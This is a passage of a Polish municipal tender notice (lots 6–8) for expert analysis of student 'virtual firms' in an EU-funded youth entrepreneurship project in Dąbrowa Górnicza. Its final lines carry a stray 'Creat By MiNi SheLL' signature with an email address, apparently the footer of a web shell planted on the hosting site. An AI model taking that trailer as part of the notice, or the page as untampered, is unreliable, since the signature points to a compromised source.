<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Usługi eksperckie polegające na ocenie 
biznes planów oraz analizie działania wirtualnych firm w ramach projektu  Liderzy młodej przedsiębiorczości
Zadanie nr 6: Analiza i ocena podejmowanych działań w ramach  wirtualnych firm.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi eksperckie w zakresie oceny biznes planów 
stworzonych przez uczniów w branży turystycznej (zadania nr 1 - 5), a także usługi polegające na ocenie działalności wirtualnych firm  stworzonych na bazie 5 wyłonionych biznes planów (zadania nr 6-8). 
Zamówienia udziela się w ramach projektu Liderzy młodej przedsiębiorczości realizowanego przez Gminę Dąbrowa Górnicza od 1.06.2011 r. do 31.05.2012 r. 
w partnerstwie z Liderem - Fundacją Regionalnej Agencji Promocji Zatrudnienia 
w Dąbrowie Górniczej oraz Związkiem Gmin Jurajskich. Projekt dofinansowany jest 
ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu II Rozwój Zasobów Ludzkich i potencjału administracyjnego przedsiębiorstw oraz poprawa stanu zdrowia osób pracujących, Działanie 2.2 Wsparcie dla systemu adaptacyjności kadr. 
Poddziałanie 2.2.1 Poprawa jakości usług świadczonych przez instytucje wspierające rozwój przedsiębiorczości i innowacyjności.
Celem projektu jest promowanie przedsiębiorczości w obszarze sektorów turystyki wśród uczniów szkół ponadgimnazjalnych z terenu gmin Jury Krakowsko - Częstochowskiej poprzez edukację w zakresie podejmowania i prowadzenia działalności gospodarczej. 
Jednym z zadań, za które odpowiedzialna jest Gmina Dąbrowa Górnicza, jest przeprowadzenie oceny biznes planów sporządzonych przez kilkuosobowe grupy uczniów. Zostanie do tego zaangażowana komisja składająca się z 5 ekspertów. Ocena biznes planów odbędzie w ramach konkursu organizowanego przez Lidera, który ma odbyć się w marcu 2012 r. (zadanie nr 1 - 5).
Do kolejnego etapu, jakim jest ocena i analiza działań podejmowanych przez wirtualne firmy zostanie zaangażowanych 3 ekspertów. Drugi etap przewidziany jest w okresie od drugiej połowy marca do połowy maja 2012 r. (zadanie nr 6 - 8).
Zadania ekspertów i przebieg prac ekspertów ds. analizy  wirtualnych firm  (dot. zadań nr 6-8):
- analiza podejmowanych decyzji przez uczniów biorących udział w projekcie - autorów   zwycięskich biznes planów i analiza podejmowanych przez nich działań w ramach   tzw. wirtualnych firm,
- analiza umiejętności rozwiązywania problemów związanych z działaniem firmy,
- sporządzane protokołów z analizy,
- bieżąca współpraca z Liderem i Zamawiającym,
- bieżące informowanie Zamawiającego o zaistniałych problemach,
- sporządzanie wszystkich wymaganych dokumentów i informacji, w tym protokołu 
z analizy  wirtualnych firm  w dniach wykonania usługi,
- prowadzenia ewidencji czasu pracy oraz rozliczania wykonanych zadań   według zestawienia stanowiącego załącznik nr 1 do umowy,
- przewidywany termin wykonania usługi: między 20.03.2012 a 15.05.2012 r., 
  O dokładnym terminie świadczenia usługi Wykonawca zostanie poinformowany przez Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu    informacji od Lidera projektu, nie później niż 2 dni  przed terminem wykonania usługi.
Każdy ekspert zobowiązany będzie do wykonania 25 analiz działalności  wirtualnych firm , tj. działań podejmowanych przez autorów 5 biznes planów w 5-ciu różnych symulacjach rynkowych - max do 12 dni. 
Symulacje rynkowe zostaną opracowane przez zespół powołany przez Lidera projektu.
- miejsce wykonywania usługi: o wyborze miejsca decyduje ilościowa przewaga biznes   planów z poszczególnych miast leżących na terenie Jury Krakowsko -   Częstochowskiej. Określenie miejsca będzie możliwe po zakończeniu naboru biznes planów, tj. po 2 marca 2012 r. O dokładnym miejscu świadczenia usługi Wykonawca zostanie poinformowany indywidualnie przez Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu informacji od Lidera projektu min. 2 dni przed rozpoczęciem usługi.
Wykonawca ponosi wszystkie koszty związane z wykonywaniem zlecenia poza siedzibą Zamawiającego, w szczególności koszty dojazdu, rozmów telefonicznych, zużycia materiałów biurowych, podstawowego sprzętu biurowego itp., a także koszty składek ubezpieczenia społecznego i ubezpieczenia zdrowotnego, podatek VAT - 
o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
Wykonawca składa oświadczenie według załącznika nr 2 do umowy dotyczącego zaangażowania w innych projektach 
w celu wykluczenia podwójnego finansowania i zweryfikowania dyspozycyjności czasowej 
do wykonania zobowiązań wynikających z wszystkich projektów i jest zobowiązany do aktualizowania oświadczenia w przypadku wystąpienia zmian.
Wykonawca może złożyć tylko 1 ofertę z zakresu zadań od 6 do 8. Wykonawca, który złożył ofertę na zadanie z zakresu 6 do 8, może złożyć jedną ofertę na zadania 
z zakresu 1 do 5. 
Wykonawca zobowiązuje się wykonać przedmiot umowy przy udziale wskazanego 
w ofercie Eksperta. Ewentualna zmiana osoby pełniącej funkcję eksperta może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osobę 
o kwalifikacjach i doświadczeniu nie niższym od określonych w Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.21.21.10-7, 79.41.00.00-1, 79.41.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Usługi eksperckie polegające na ocenie 
biznes planów oraz analizie działania wirtualnych firm w ramach projektu  Liderzy młodej przedsiębiorczości
Zadanie nr 7: Analiza i ocena podejmowanych działań w ramach  wirtualnych firm.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi eksperckie w zakresie oceny biznes planów 
stworzonych przez uczniów w branży turystycznej (zadania nr 1 - 5), a także usługi polegające na ocenie działalności wirtualnych firm  stworzonych na bazie 5 wyłonionych biznes planów (zadania nr 6-8). 
Zamówienia udziela się w ramach projektu Liderzy młodej przedsiębiorczości realizowanego przez Gminę Dąbrowa Górnicza od 1.06.2011 r. do 31.05.2012 r. 
w partnerstwie z Liderem - Fundacją Regionalnej Agencji Promocji Zatrudnienia 
w Dąbrowie Górniczej oraz Związkiem Gmin Jurajskich. Projekt dofinansowany jest 
ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu II Rozwój Zasobów Ludzkich i potencjału administracyjnego przedsiębiorstw oraz poprawa stanu zdrowia osób pracujących, Działanie 2.2 Wsparcie dla systemu adaptacyjności kadr. 
Poddziałanie 2.2.1 Poprawa jakości usług świadczonych przez instytucje wspierające rozwój przedsiębiorczości i innowacyjności.
Celem projektu jest promowanie przedsiębiorczości w obszarze sektorów turystyki wśród uczniów szkół ponadgimnazjalnych z terenu gmin Jury Krakowsko - Częstochowskiej poprzez edukację w zakresie podejmowania i prowadzenia działalności gospodarczej. 
Jednym z zadań, za które odpowiedzialna jest Gmina Dąbrowa Górnicza, jest przeprowadzenie oceny biznes planów sporządzonych przez kilkuosobowe grupy uczniów. Zostanie do tego zaangażowana komisja składająca się z 5 ekspertów. Ocena biznes planów odbędzie w ramach konkursu organizowanego przez Lidera, który ma odbyć się w marcu 2012 r. (zadanie nr 1 - 5).
Do kolejnego etapu, jakim jest ocena i analiza działań podejmowanych przez wirtualne firmy zostanie zaangażowanych 3 ekspertów. Drugi etap przewidziany jest w okresie od drugiej połowy marca do połowy maja 2012 r. (zadanie nr 6 - 8).
Zadania ekspertów i przebieg prac ekspertów ds. analizy  wirtualnych firm  (dot. zadań nr 6-8):
- analiza podejmowanych decyzji przez uczniów biorących udział w projekcie - autorów   zwycięskich biznes planów i analiza podejmowanych przez nich działań w ramach   tzw. wirtualnych firm,
- analiza umiejętności rozwiązywania problemów związanych z działaniem firmy,
- sporządzane protokołów z analizy,
- bieżąca współpraca z Liderem i Zamawiającym,
- bieżące informowanie Zamawiającego o zaistniałych problemach,
- sporządzanie wszystkich wymaganych dokumentów i informacji, w tym protokołu 
z analizy  wirtualnych firm  w dniach wykonania usługi,
- prowadzenia ewidencji czasu pracy oraz rozliczania wykonanych zadań   według zestawienia stanowiącego załącznik nr 1 do umowy,
- przewidywany termin wykonania usługi: między 20.03.2012 a 15.05.2012 r., 
  O dokładnym terminie świadczenia usługi Wykonawca zostanie poinformowany przez Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu    informacji od Lidera projektu, nie później niż 2 dni  przed terminem wykonania usługi.
Każdy ekspert zobowiązany będzie do wykonania 25 analiz działalności  wirtualnych firm , tj. działań podejmowanych przez autorów 5 biznes planów w 5-ciu różnych symulacjach rynkowych - max do 12 dni. 
Symulacje rynkowe zostaną opracowane przez zespół powołany przez Lidera projektu.
- miejsce wykonywania usługi: o wyborze miejsca decyduje ilościowa przewaga biznes   planów z poszczególnych miast leżących na terenie Jury Krakowsko -   Częstochowskiej. Określenie miejsca będzie możliwe po zakończeniu naboru biznes planów, tj. po 2 marca 2012 r. O dokładnym miejscu świadczenia usługi Wykonawca zostanie poinformowany indywidualnie przez Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu informacji od Lidera projektu min. 2 dni przed rozpoczęciem usługi.
Wykonawca ponosi wszystkie koszty związane z wykonywaniem zlecenia poza siedzibą Zamawiającego, w szczególności koszty dojazdu, rozmów telefonicznych, zużycia materiałów biurowych, podstawowego sprzętu biurowego itp., a także koszty składek ubezpieczenia społecznego i ubezpieczenia zdrowotnego, podatek VAT - 
o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
Wykonawca składa oświadczenie według załącznika nr 2 do umowy dotyczącego zaangażowania w innych projektach 
w celu wykluczenia podwójnego finansowania i zweryfikowania dyspozycyjności czasowej 
do wykonania zobowiązań wynikających z wszystkich projektów i jest zobowiązany do aktualizowania oświadczenia w przypadku wystąpienia zmian.
Wykonawca może złożyć tylko 1 ofertę z zakresu zadań od 6 do 8. Wykonawca, który złożył ofertę na zadanie z zakresu 6 do 8, może złożyć jedną ofertę na zadania 
z zakresu 1 do 5. 
Wykonawca zobowiązuje się wykonać przedmiot umowy przy udziale wskazanego 
w ofercie Eksperta. Ewentualna zmiana osoby pełniącej funkcję eksperta może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osobę 
o kwalifikacjach i doświadczeniu nie niższym od określonych w Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.21.21.10-7, 79.41.00.00-1, 79.41.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Usługi eksperckie polegające na ocenie 
biznes planów oraz analizie działania wirtualnych firm w ramach projektu  Liderzy młodej przedsiębiorczości
Zadanie nr 8: Analiza i ocena podejmowanych działań w ramach  wirtualnych firm.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi eksperckie w zakresie oceny biznes planów 
stworzonych przez uczniów w branży turystycznej (zadania nr 1 - 5), a także usługi polegające na ocenie działalności wirtualnych firm  stworzonych na bazie 5 wyłonionych biznes planów (zadania nr 6-8). 
Zamówienia udziela się w ramach projektu Liderzy młodej przedsiębiorczości realizowanego przez Gminę Dąbrowa Górnicza od 1.06.2011 r. do 31.05.2012 r. 
w partnerstwie z Liderem - Fundacją Regionalnej Agencji Promocji Zatrudnienia 
w Dąbrowie Górniczej oraz Związkiem Gmin Jurajskich. Projekt dofinansowany jest 
ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu II Rozwój Zasobów Ludzkich i potencjału administracyjnego przedsiębiorstw oraz poprawa stanu zdrowia osób pracujących, Działanie 2.2 Wsparcie dla systemu adaptacyjności kadr. 
Poddziałanie 2.2.1 Poprawa jakości usług świadczonych przez instytucje wspierające rozwój przedsiębiorczości i innowacyjności.
Celem projektu jest promowanie przedsiębiorczości w obszarze sektorów turystyki wśród uczniów szkół ponadgimnazjalnych z terenu gmin Jury Krakowsko - Częstochowskiej poprzez edukację w zakresie podejmowania i prowadzenia działalności gospodarczej. 
Jednym z zadań, za które odpowiedzialna jest Gmina Dąbrowa Górnicza, jest przeprowadzenie oceny biznes planów sporządzonych przez kilkuosobowe grupy uczniów. Zostanie do tego zaangażowana komisja składająca się z 5 ekspertów. Ocena biznes planów odbędzie w ramach konkursu organizowanego przez Lidera, który ma odbyć się w marcu 2012 r. (zadanie nr 1 - 5).
Do kolejnego etapu, jakim jest ocena i analiza działań podejmowanych przez wirtualne firmy zostanie zaangażowanych 3 ekspertów. Drugi etap przewidziany jest w okresie od drugiej połowy marca do połowy maja 2012 r. (zadanie nr 6 - 8).
Zadania ekspertów i przebieg prac ekspertów ds. analizy  wirtualnych firm  (dot. zadań nr 6-8):
- analiza podejmowanych decyzji przez uczniów biorących udział w projekcie - autorów   zwycięskich biznes planów i analiza podejmowanych przez nich działań w ramach   tzw. wirtualnych firm,
- analiza umiejętności rozwiązywania problemów związanych z działaniem firmy,
- sporządzane protokołów z analizy,
- bieżąca współpraca z Liderem i Zamawiającym,
- bieżące informowanie Zamawiającego o zaistniałych problemach,
- sporządzanie wszystkich wymaganych dokumentów i informacji, w tym protokołu 
z analizy  wirtualnych firm  w dniach wykonania usługi,
- prowadzenia ewidencji czasu pracy oraz rozliczania wykonanych zadań   według zestawienia stanowiącego załącznik nr 1 do umowy,
- przewidywany termin wykonania usługi: między 20.03.2012 a 15.05.2012 r., 
  O dokładnym terminie świadczenia usługi Wykonawca zostanie poinformowany przez Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu    informacji od Lidera projektu, nie później niż 2 dni  przed terminem wykonania usługi.
Każdy ekspert zobowiązany będzie do wykonania 25 analiz działalności  wirtualnych firm , tj. działań podejmowanych przez autorów 5 biznes planów w 5-ciu różnych symulacjach rynkowych - max do 12 dni. 
Symulacje rynkowe zostaną opracowane przez zespół powołany przez Lidera projektu.
- miejsce wykonywania usługi: o wyborze miejsca decyduje ilościowa przewaga biznes   planów z poszczególnych miast leżących na terenie Jury Krakowsko -   Częstochowskiej. Określenie miejsca będzie możliwe po zakończeniu naboru biznes planów, tj. po 2 marca 2012 r. O dokładnym miejscu świadczenia usługi Wykonawca zostanie poinformowany indywidualnie przez Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu informacji od Lidera projektu min. 2 dni przed rozpoczęciem usługi.
Wykonawca ponosi wszystkie koszty związane z wykonywaniem zlecenia poza siedzibą Zamawiającego, w szczególności koszty dojazdu, rozmów telefonicznych, zużycia materiałów biurowych, podstawowego sprzętu biurowego itp., a także koszty składek ubezpieczenia społecznego i ubezpieczenia zdrowotnego, podatek VAT - 
o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
Wykonawca składa oświadczenie według załącznika nr 2 do umowy dotyczącego zaangażowania w innych projektach 
w celu wykluczenia podwójnego finansowania i zweryfikowania dyspozycyjności czasowej 
do wykonania zobowiązań wynikających z wszystkich projektów i jest zobowiązany do aktualizowania oświadczenia w przypadku wystąpienia zmian.
Wykonawca może złożyć tylko 1 ofertę z zakresu zadań od 6 do 8. Wykonawca, który złożył ofertę na zadanie z zakresu 6 do 8, może złożyć jedną ofertę na zadania 
z zakresu 1 do 5. 
Wykonawca zobowiązuje się wykonać przedmiot umowy przy udziale wskazanego 
w ofercie Eksperta. Ewentualna zmiana osoby pełniącej funkcję eksperta może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osobę 
o kwalifikacjach i doświadczeniu nie niższym od określonych w Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.21.21.10-7, 79.41.00.00-1, 79.41.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com